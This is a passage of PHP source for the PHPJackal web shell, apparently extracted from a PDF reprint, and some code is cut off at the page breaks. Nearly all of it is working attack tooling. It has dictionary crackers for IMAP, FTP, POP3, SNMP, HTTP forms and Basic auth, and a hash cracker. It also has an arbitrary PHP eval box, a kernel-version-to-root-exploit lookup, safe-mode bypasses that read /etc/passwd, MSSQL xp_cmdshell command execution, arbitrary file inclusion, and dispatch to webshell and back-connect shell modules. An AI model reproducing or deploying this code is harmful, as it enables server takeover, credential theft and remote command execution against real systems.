Summery: Total: $total Directories: $dc Files: $fc Links: $lc$et$td1n$td2m$hcwd$td1n Note: Max allowed file size to upload on thisserver is $min$et$et";}}function imapchecK($host,$username,$password,$timeout){$sock=fsockopen($host,143,$n,$s,$timeout);$b=uniqid('NJ');$l=strlen($b);if(!$sock)return -1;fread($sock,1024);fputs($sock,"$b LOGIN $username $password\r\n");$res=fgets($sock,$l+4);fclose($sock);if($res=="$b OK")return 1;else return 0;}function ftpchecK($host,$username,$password,$timeout){$ftp=ftp_connect($host,21,$timeout);if(!$ftp)return -1;$con=ftp_login($ftp,$username,$password);if($con)return 1;else return 0;}function pop3checK($server,$user,$pass,$timeout){$sock=fsockopen($server,110,$en,$es,$timeout);if(!$sock)return -1;fread($sock,1024);
fwrite($sock,"user $user\n");$r=fgets($sock);if($r{0}=='-')return 0;
-
5/13/2018 Php Jackal
22/39
fwrite($sock,"pass $pass\n");$r=fgets($sock);fclose($sock);if($r{0}=='+')return 1;return 0;}function formcrackeR(){
global $errorbox,$footer,$et,$hcwd;if(!empty($_REQUEST['start'])){if(isset($_REQUEST['loG'])&& !empty($_REQUEST['logfilE'])){$log=1;$file=$_REQUEST['logfilE'];}else $log=0;$url=$_REQUEST['target'];$uf=$_REQUEST['userf'];$pf=$_REQUEST['passf'];$sf=$_REQUEST['submitf'];$sv=$_REQUEST['submitv'];$method=$_REQUEST['method'];$fail=$_REQUEST['fail'];$dic=$_REQUEST['dictionary'];
$type=$_REQUEST['combo'];$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:'';if(!file_exists($dic))die("$errorbox Can not open dictionary.$et$footer");$dictionary=fopen($dic,'r');echo 'Cracking started...
';while(!feof($dictionary)){if($type){$combo=trim(fgets($dictionary)," \n\r");$user=substr($combo,0,strpos($combo,':'));$pass=substr($combo,strpos($combo,':')+1);}else{$pass=trim(fgets($dictionary)," \n\r");}$url.="?$uf=$user&$pf=$pass&$sf=$sv";$res=check_urL($url,$method,$fail,12);if(!$res){echo "U: $user P: $pass
";if($log)file_add_contentS($file,"U: $user P: $pass\r\n");if(!$type)break;}}fclose($dictionary);echo 'Done!
';}else echo "HTTP Form cracker:Dictionary:Dictionary type:Simple (P)Combo (U:P)Username:$hcwdAction Page:Method:POSTGETUsername field name:Password field name: -
5/13/2018 Php Jackal
23/39
4' bgcolor='#808080'>Submit name:Submit value:Fail string:Log $et";}function hashcrackeR(){global $errorbox,$t,$et,$hcwd;if(!empty($_REQUEST['hash']) && !empty($_REQUEST['dictionary']) && !empty($_REQUEST['type'])){if(isset($_REQUEST['loG'])&& !empty($_REQUEST['logfilE'])){$log=1;$file=$_REQUEST['logfilE'];}else $log=0;$dictionary=fopen($_REQUEST['dictionary'],'r');
if($dictionary){$hash=strtoupper($_REQUEST['hash']);echo 'Cracking '.htmlspecialchars($hash).'...
';$type=($_REQUEST['type']=='MD5')?'md5':'sha1';while(!feof($dictionary)){$word=trim(fgets($dictionary)," \n\r");if($hash==strtoupper(($type($word)))){echo "The answer is $word
";if($log)file_add_contentS($file,"$x\r\n");break;}}echo 'Done!';fclose($dictionary);}else{echo "$errorbox Can not open dictionary.$et";}}echo "${t}Hash cracker:Dictionary:Hash:Type:MD5SHA1L
og $hcwd $et";}function pr0xy(){global $errorbox,$et,$footer,$hcwd;echo "Navigator: $hcwd$et";if(!empty($_REQUEST['urL'])){
$u=parse_url($_REQUEST['urL']);$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';$dir=dirname($file);
-
5/13/2018 Php Jackal
24/39
$con=getiT($_REQUEST['urL']);$s=array("href=mailto"=>"HrEf=mailto","HREF=mailto"=>"HrEf=mailto","href='mailto"=>"HrEf=\"mailto","HREF=\"mailto"=>"HrEf=\"mailto","href=\'mailto"=>"HrEf=\"mailto","HREF=\'mailto"=>"HrEf=\"mailto","href=\"http"=>"HrEf=\"".hlinK("seC=px&urL=http"),"href=\'http"=>"HrEf=\"".hlinK("seC=px&urL=http"),"HREF=\'http"=>"HrEf=\"".hlinK("seC=px&urL=http"),"href=http"=>"HrEf=".hlinK("seC=px&urL=http"),"HREF=http"=>"HrEf=".hlinK("seC=px&urL=http"),"href=\""=>"HrEf=\"".hlinK("seC=px&urL=h
ttp://$host/$dir/"),"HREF=\""=>"HrEf=\"".hlinK("seC=px&urL=http://$host/$dir/"),"href=\""=>"HrEf=\'".hlinK("seC=px&urL=http://$host/$dir/"),'HREF="'=>'HrEf="'.hlinK("seC=px&urL=http://$host/$dir/"),"href="=>"HrEf=".hlinK("seC=px&urL=http://$host/$dir/"),"HREF="=>"HrEf=".hlinK("seC=px&urL=http://$host/$dir/"));$con=replace_stR($s,$con);echo $con;}}function sqlclienT(){global $t,$errorbox,$et,$hcwd;if(!empty($_REQUEST['serveR']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS']) && !empty($_REQUEST['querY'])){
$server=$_REQUEST['serveR'];$type=$_REQUEST['typE'];$pass=$_REQUEST['pasS'];$user=$_REQUEST['useR'];$query=$_REQUEST['querY'];$db=(empty($_REQUEST['dB']))?'':$_REQUEST['dB'];$res=querY($type,$server,$user,$pass,$db,$query);if($res){$res=str_replace('-----','',$res);$res=str_replace('+++++','',$res);$r=explode('[+][+][+]',$res);$r[1]=str_replace('[-][-][-]',"",$r[1]);echo "".$r[1].''.$r[0]."$et
";}else{echo "$errorbox Failed!$et
";}}if(empty($_REQUEST['typE']))$_REQUEST['typE']='';echo "${t}SQL cilent:MySQLMSSQLOraclePostgreSQLServer:Username:Password:Database:Query:";if (!empty($_REQUEST['querY'])) echo htmlspecialchars(($_REQUEST['querY']));else echo 'SHOW DATABASES'; echo "$hcwd -
5/13/2018 Php Jackal
25/39
class=buttons type=submit value='Submit Query'>$et";}function querY($type,$host,$user,$pass,$db='',$query){$res='';switch($type){case 'MySQL':if(!function_exists('mysql_connect'))return 0;
$link=mysql_connect($host,$user,$pass);if($link){if(!empty($db))mysql_select_db($db,$link);$result=mysql_query($query,$link);while($data=mysql_fetch_row($result))$res.=implode('-----',$data).'+++++';$res.='[+][+][+]';for($i=0;$i
-
5/13/2018 Php Jackal
26/39
return $res;}break;}return 0;}function phpevaL(){
global $t,$hcwd,$et;echo '';if(!empty($_REQUEST['code'])){$s=array(''=>'');echo "";echo htmlspecialchars(eval(replace_stR($s,$_REQUEST['code'])));echo '
';}echo "${t}Evaler:Codes:";if(!empty($_REQUEST['code']))echo htmlspecialchars($_REQUEST['code']);echo "$hcwd$et";}function rootxpL(){$v=php_uname();$db=array('2.6.17'=>'prctl3, raptor_prctl, py2','2.6.16'=>'raptor_prctl, exp.sh,raptor, raptor2, h00lyshit','2.6.15'=>'py2, exp.sh, raptor, raptor2, h00lyshit','2.6.14'=>'raptor, raptor2, h00lyshit','2.6.13'=>'kdump, local26, py2, raptor_prctl, exp.sh, prctl3, h00lyshit','2.6.12'=>'h00lyshit','2.6.11'=>'krad3, krad, h00lyshit','2.6.10'=>'h00lyshit, stackgrow2, uselib24, exp.sh, krad, krad2','2.6.9'=>'exp.sh, krad3, py2, prctl3, h00lyshit','2.6.8'=>'h00lyshit, krad, krad2','2.6.7'=>'h00lyshit, krad, krad2','2.6.6'=>'h00lyshit, krad, krad2','2.6.2'=>'h00lyshit, krad, mremap_pte','2.6.'=>'prctl, kmdx, newsmp, pwned, ptrace_kmod, ong_bak','2.4.29'=>'elflbl, expand_stack, stackgrow2, uselib24, smpracer','2.4.27'=>'elfdump, uselib24','2.4.25'=>'uselib24','2.4.24'=>'mremap_pte, loko, uselib24','2.4.23'=>'mremap_pte, loko, uselib24','2.4.22'=>'loginx, brk, km2, loko, ptrace,uselib24, brk2, ptrace-kmod','2.4.21'=>'w00t, brk, uselib24, loginx, brk2, ptrace-kmod','2.4.20'=>'mremap_pte, w00t, brk, ave, uselib24, loginx, ptrace-kmod, ptrace, kmod','2.4.19'=>'newlocal, w00t, ave, uselib24, loginx, kmod','2.4.18'=>'km2, w00t, uselib24, loginx, kmod','2.4.17'=>'newlocal, w00t, uselib24, loginx,kmod','2.4.16'=>'w00t, uselib24, loginx','2.4.10'=>'w00t, brk, uselib24, loginx','2.4.9'=>'ptrace24, uselib24','2.4.'=>'kmdx, remap, pwned, ptrace_kmod, ong_bak','2.2.25'=>'mremap_pte','2.2.24'=>'ptrace','2.2.'=>'rip, ptrace');foreach($db as $k=>$x)if(strstr($v,$k))return $x;return 0;}
function toolS(){global $t,$hcwd,$et,$cwd;if(!empty($_REQUEST['serveR']) && !empty($_REQUEST['domaiN'])){$ser=fsockopen($_REQUEST['serveR'],43,$en,$es,5);fputs($ser,$_REQUEST['domaiN']."\r\n");echo '';while(!feof($ser))echo fgets($ser,1024);echo '';fclose($ser);}elseif(!empty($_REQUEST['urL'])){$h='';$u=parse_url($_REQUEST['urL']);
$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';$port=(empty($u['port']))?80:$u['port'];$ser=fsockopen($host,$port,$en,$es,5);
-
5/13/2018 Php Jackal
27/39
if($ser){fputs($ser,"GET $file\r\nHost: $host\r\n\r\n");echo '';while($h!="\r\n"){$h=fgets($ser,1024);echo $h;}echo '';fclose($ser);}
}elseif(!empty($_REQUEST['ouT']) && isset($_REQUEST['pW'])&& !empty($_REQUEST['uN'])){$htpasswd=$_REQUEST['ouT'].DIRECTORY_SEPARATOR.'.htpasswd';$htaccess=$_REQUEST['ouT'].DIRECTORY_SEPARATOR.'.htaccess';file_put_contents($htpasswd,$_REQUEST['uN'].':'.crypt(trim($_REQUEST['pW']),CRYPT_STD_DES));file_put_contents($htaccess,"AuthName \"Secure\"\r\nAuthType Basic\r\nAuthUserFile $htpasswd\r\nRequire valid-user\r\n");echo 'Done';}$s="";echo "${t}WhoIs:${s}Server:domain:$hcwd$et
${t}.ht* generator:${s}Username:Password:Directory:$hcwd$et
${t}Grab header:${s}URL:$hcwd$et
";}function hexvieW(){if(!empty($_REQUEST['filE'])){$f=$_REQUEST['filE'];echo "OffsetHexASCII";$file=fopen($f,'r');$i=-1;while(!feof($file)){$ln='';$i++;echo "";echo str_repeat('0',(8-strlen($i*16))).$i*16;echo '';echo "
-
5/13/2018 Php Jackal
28/39
echo "'>";for($j=0;$j
-
5/13/2018 Php Jackal
29/39
echo "$pr$i:(mb_send_mail$po";if(file_exists('/tmp/mb_send_mail'))unlink('/tmp/mb_send_mail');mb_send_mail(NULL, NULL, NULL, NULL,'-C $file -X /tmp/mb_send_mail');readfile('/tmp/mb_send_mail');$i++;}if(function_exists('curl_init')){
echo "$pr$i:(curl_init [A]$po";$fh=curl_init('file://'.$file.'');$tmp=curl_exec($fh);echo $tmp;$i++;echo "$pr$i:(curl_init [B]$po";$i++;if(strstr($file,DIRECTORY_SEPARATOR))$ch=curl_init('file:///'.$file."\x00/../../../../../../../../../../../../".__FILE__);else $ch=curl_init('file://'.$file."\x00".__FILE__);var_dump(curl_exec($ch));}
if(is_writable('.')){echo "$pr$i:(php.ini$po";file_put_contents('php.ini','safe_mode = Off');readfile($file);unlink('php.ini');$i++;}if(extension_loaded('perl')){echo "$pr$i:(perl$po";echo perlshelL("type \"$file\"");$i++;}if(is_object($ws=new COM('WScript.Shell'))){
echo "$pr$i:(COM$po";echo comshelL("type \"$file\"",$ws);$i++;}if(extension_loaded('ffi') && $windows){echo "$pr$i:(FFI$po";echo ffishelL("type \"$file\"");$i++;}if(checkfunctioN('win_shell_execute')){echo "$pr$i:(win32std$po";echo winshelL("type \"$file\"");
$i++;}if(checkfunctioN('win32_create_service')){echo "$pr$i:(win32service$po";echo srvshelL("type \"$file\"");$i++;}if(function_exists('imap_open')){echo "$pr$i:(imap [A]$po";$str=imap_open('/etc/passwd','','');$list=imap_list($str,$file,'*');for($i=0;$i
-
5/13/2018 Php Jackal
30/39
$tmp=imap_body($str,1);echo $tmp;imap_close($str);$i++;}if($file=='/etc/passwd'){echo "$pr$i:(posix$po";
for($uid=0;$uid1)$list=imap_list($str,trim($s[0]),trim($s[1]));else $list=imap_list($str,trim($str[0]),'*');for($i=0;$i
-
5/13/2018 Php Jackal
31/39
echo '';}elseif(!empty($_REQUEST['serveR']) && !empty($_REQUEST['coM']) && !empty($_REQUEST['dB']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS'])){$res='';$tb=uniqid('NJ');$db=mssql_connect($_REQUEST['serveR'],$_REQUEST['useR'],$_REQUEST['pasS']);
mssql_select_db($_REQUEST['dB'],$db);mssql_query("create table $tb ( string VARCHAR (500) NULL)",$db);mssql_query("insert into $tb EXEC master.dbo.xp_cmdshell '".$_REQUEST['coM']."'",$db);$re=mssql_query("select * from $tb",$db);while(($row=mssql_fetch_row($re))){$res.= $row[0]."\r\n";}mssql_query("drop table $tb",$db);mssql_close($db);echo "$res
";}$f=(!empty($_REQUEST['file']))?htmlspecialchars($_REQUEST['file']):'/etc/passwd';$u=(!empty($_REQUEST['user']))?htmlspecialchars($_REQUEST['user']):'root';$p=(!empty($_REQUEST['pass']))?htmlspecialchars($_REQUEST['pass']):'123456';$d=(!empty($_REQUEST['db']))?htmlspecialchars($_REQUEST['db']):'test';echo "${t}Use PHP Bugs:File:$hcwd$et
${t}Use MySQL:File:Username:Password:Database:$hcwd$et
${t}MSSQL Exec:Server:Username:Password:Command:Database:$hcwd$et";}function crackeR(){global $errorbox,$t,$et,$crack,$cwd;$check=(!empty($_REQUEST['dictionary']) && !empty($_REQUEST['target']))?1:0;if(!empty($_REQUEST['cracK']) && !$check){
-
5/13/2018 Php Jackal
32/39
$c=htmlspecialchars($_REQUEST['cracK']);echo "$t$c cracker:$crack";}elseif(!empty($_REQUEST['cracK']) && $check){$pro=strtolower($_REQUEST['cracK']).'checK';$target=$_REQUEST['target'];$type=$_REQUEST['combo'];
$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:'';$dictionary=fopen($_REQUEST['dictionary'],'r');if(isset($_REQUEST['loG'])&& !empty($_REQUEST['logfilE'])){$log=1;$file=$_REQUEST['logfilE'];}else $log=0;if($dictionary){echo 'Cracking '.htmlspecialchars($target).'...
';while(!feof($dictionary)){if($type){$combo=trim(fgets($dictionary)," \n\r");$user=substr($combo,0,strpos($combo,':'));$pass=substr($combo,strpos($combo,':')+1);}else{$pass=trim(fgets($dictionary)," \n\r");}$ret=$pro($target,$user,$pass,5);if($ret==-1){echo "$errorbox Can not connect to server.$et";break;}else{if($ret){$x="U: $user P: $pass";echo "$x
";if($log)file_add_contentS($file,"$x\r\n");if(!$type)break;}}}echo '
Done';fclose($dictionary);}else{echo "$errorbox Can not open dictionary.$et";}}else{echo "[Hash] - [SMTP] - [POP3] - [IMAP]- [FTP] - [SNMP] - [MySQL] - [MSSQL] - [HTTP Form] - [HTTP Auth(basic)] - [Dictionary maker]$et";}}function snmpcrackeR(){global $t,$et,$errorbox,$hcwd;if(!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){$target=$_REQUEST['target'];if(isset($_REQUEST['loG'])&& !empty($_REQUEST['logfilE'])){$log=1;$file=$_REQUEST['logfilE'];}else $log=0;$dictionary=fopen($_REQUEST['dictionary'],'r');if($dictionary){echo 'Cracking '.htmlspecialchars($target).'...
';while(!feof($dictionary)){$com=trim(fgets($dictionary)," \n\r");$res=snmpchecK($target,$com,2);if($res){echo "$com
";if($log)file_add_contentS($file,"$com\r\n");} -
5/13/2018 Php Jackal
33/39
}echo '
Done';fclose($dictionary);}else{echo "$errorbox Can not open dictionary.$et";}}else echo "${t}SNMP cracker:$hcwdDictionary:Server:Log $et";}function dicmakeR(){
global $errorbox,$windows,$footer,$t,$et,$hcwd;$combo=(empty($_REQUEST['combo']))?0:1;if(!empty($_REQUEST['range'])&& !empty($_REQUEST['output']) && !empty($_REQUEST['min']) && !empty($_REQUEST['max'])){$min=$_REQUEST['min'];$max=$_REQUEST['max'];if($max
-
5/13/2018 Php Jackal
34/39
$user=trim(fgets($in)," \n\r");if(!strstr($user,':'))continue;$user=substr($user,0,(strpos($user,':')));if($combo)fwrite($output,$user.':'.$user."\n");else fwrite($output,$user."\n");}fclose($input);fclose($output);echo 'Done';
}}}else{$output=fopen($_REQUEST['output'],'w');if($output){while(!feof($input)){$user=trim(fgets($input)," \n\r");if(!strstr($user,':'))continue;$user=substr($user,0,(strpos($user,':')));if($combo)fwrite($output,$user.':'.$user."\n");else fwrite($output,$user."\n");}
fclose($input);fclose($output);echo 'Done';}else echo $errorbox.' Unable to write data to '.htmlspecialchars($_REQUEST['input'])."$et
";}}elseif(!empty($_REQUEST['url']) && !empty($_REQUEST['output'])){$res=downloadiT($_REQUEST['url'],$_REQUEST['output']);if($combo && $res){$file=file($_REQUEST['output']);$output=fopen($_REQUEST['output'],'w');foreach($file as $v)fwrite($output,"$v:$v\n");fclose($output);}echo 'Done';}else{$temp=whereistmP().DIRECTORY_SEPARATOR;echo "${t}Wordlist generator:Range:a-zA-Z0-9Min lenght:12345678910Max lenght:23456789101112131415Output:Combo style output$hcwd$et
${t}Grab dictionary:Grab from:Output: -
5/13/2018 Php Jackal
35/39
lue='$temp.dic' name=output size=35>Combo style output$hcwd$et
${t}Download dictionary:URL:Output:Combo style output$hcwd$et";}}function ftpclienT(){global $t,$cwd,$hcwd,$errorbox,$et;$td="";if(!empty($_REQUEST['hosT']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS']) && function_exists('ftp_connect')){$user=$_REQUEST['useR'];$pass=$_REQUEST['pasS'];$host=$_REQUEST['hosT'];$con=ftp_connect($_REQUEST['hosT'],21,10);if($con){$ftp=ftp_login($con,$user,$pass);if($ftp){if(!empty($_REQUEST['PWD']))ftp_chdir($con,$_REQUEST['PWD']);if(!empty($_REQUEST['filE'])){$file=$_REQUEST['filE'];$mode=(isset($_REQUEST['modE']))?FTP_BINARY:FTP_ASCII;if(isset($_REQUEST['geT']))ftp_get($con,$file,$file,$mode);elseif(isset($_REQUEST['puT']))ftp_put($con,$file,$file,$mode);elseif(isset($_REQUEST['rM'])){
ftp_rmdir($con,$file);ftp_delete($con,$file);}elseif(isset($_REQUEST['mD']))ftp_mkdir($con,$file);}$pwd=ftp_pwd($con);$dir=ftp_nlist($con,'');$d=opendir($cwd);echo "${td}Server:${td}Client:$td$td$td";foreach($dir as $n)echo "$n
";echo "$td";while($cdir=readdir($d))if($cdir!='.' && $cdir!='..')echo "$cdir
"; echo "${td}Name:Binary$td$et";}else echo "$errorbox Wrong username or password$et";}else echo "$errorbox Can not connect to server!$et";}else{echo "${t}FTP cilent:Server:
-
5/13/2018 Php Jackal
36/39
'#666666'>Username:Password:$hcwd$et";
}}function calC(){global $t,$et,$hcwd;$fu=array('-','md5','sha1','crc32','hex','ip2long','decbin','dechex','hexdec','bindec','long2ip','base64_encode','base64_decode','urldecode','urlencode','des','strrev');if(!empty($_REQUEST['input']) && (in_array($_REQUEST['to'],$fu))){$to=$_REQUEST['to'];echo "${t}Output:
";if($to=='hex')for($i=0;$i -
5/13/2018 Php Jackal
37/39
$pass=trim(fgets($dictionary)," \n\r");}$so=fsockopen($host,80,$en,$es,5);if(!$so){echo "$errorbox Can not connect to host$et";break;}else{$packet="$method /$page HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nConnection: Close\r\nAuthorization: Basic ".base64_encode("$user:$
pass");if($method=='POST')$packet.='Content-Type: application/x-www-form-urlencoded\r\nContent-Length: '.strlen($data);$packet.="\r\n\r\n";$packet.=$data;fputs($so,$packet);$res=substr(fgets($so),9,2);fclose($so);if($res=='20'){echo "U: $user P: $pass";if($log)file_add_contentS($file,"U:$user P: $pass\r\n");}}}
echo 'Done!';}else echo "${t}HTTP Auth cracker:POSTGETDictionary:Dictionary type:Simple (P)Combo (U:P)Username:Server:Log $hcwd $et";}function openiT($name){$ext=strtolower(substr($name,strrpos($name,'.')+1));$src=array('php','php3','php4','phps','phtml','phtm','inc');if(in_array($ext,$src))highlight_file($name);else echo ''.htmlspecialchars(file_get_contents($name)).'';}function opensesS($name){$sess=file_get_contents($name);$var=explode(';',$sess);echo "Name\tType\tValue\r\n";foreach($var as $v){$t=explode('',$v);$c=explode(':',$t[1]);$y='';if($c[0]=='i')$y='Integer';elseif($c[0]=='s')$y='String';elseif($c[0]=='b')$y='Boolean';elseif($c[0]=='f')$y='Float';elseif($c[0]=='a')$y='Array';elseif($c[0]=='o')$y='Object';elseif($c[0]=='n')$y='Null';
echo $t[0]."\t$y\t".$c[1]."\r\n";}echo '';
-
5/13/2018 Php Jackal
38/39
}function logouT(){setcookie('passw','',time()-10000);header('Location: '.hlinK());}?>
body{scrollbar-base-color: #484848; scrollbar-arrow-color: #FFFFFF; scrollbar-track-color: #969696;font-size:16px;font-family:"Arial Narrow";}Table {font-size: 15px;} .buttons{font-family:Verdana;font-size:10pt;font-weight:normal;font-style:normal;color:#FFFFFF;background-color:#555555;border-style:solid;border-width:1px;border-color:#FFFFFF;}textarea{border: 0px #000000 solid;background: #EEEEEE;color: #000000;}input{background: #EEEEEE;border-width:1px;border-style:solid;border-color:black}select{background: #EEEEEE; border: 0px #000000 none;}function HS(box){
if(document.getElementById(box).style.display!="none"){document.getElementById(box).style.display="none";document.getElementById('lk').innerHTML="+";}else{document.getElementById(box).style.display="";document.getElementById('lk').innerHTML="-";}}function chmoD($file){$ch=prompt("Changing file mode["+$file+"]: ex. 777","");if($ch != null)location.href=""+$file+"&modE="+$ch;
}PHPJackal [][Back] -
-
5/13/2018 Php Jackal
39/39
case 'fm':filemanageR();break;case 'sc':scanneR();break;case 'phpinfo':phpinfo();break;case 'edit':if(!empty($_REQUEST['open']))editoR($_REQUEST['filE']);if(!empty($_REQUEST['Save'])){$filehandle=fopen($_REQUEST['file'],'w');fwrite($filehandle,$_REQUEST['edited']);
fclose($filehandle);}if(!empty($_REQUEST['filE']))editoR($_REQUEST['filE']);else editoR('');break;case 'openit':openiT($_REQUEST['namE']);break;case 'cr':crackeR();break;case 'dic':dicmakeR();break;case 'tools':toolS();break;case 'hex':hexvieW();break;case 'img':showimagE($_REQUEST['filE']);break;case 'inc':if(file_exists($_REQUEST['filE']))include($_REQUEST['filE']);break;case 'hc':hashcrackeR();break;case 'fcr':formcrackeR();break;
case 'auth':authcrackeR();break;case 'ftpc':ftpclienT();break;case 'eval':phpevaL();break;case 'snmp':snmpcrackeR();break;case 'px':pr0xy();break;case 'webshell':webshelL();break;case 'mailer':maileR();break;case 'br':brshelL();break;case 'asm':safemodE();break;case 'sqlcl':sqlclienT();break;case 'calc':calC();break;case 'sysinfo':sysinfO();break;case 'checksum':checksuM($_REQUEST['filE']);break;
case 'logout':logouT();break;default: echo $intro;}}else echo $intro;echo $footer;?>
top related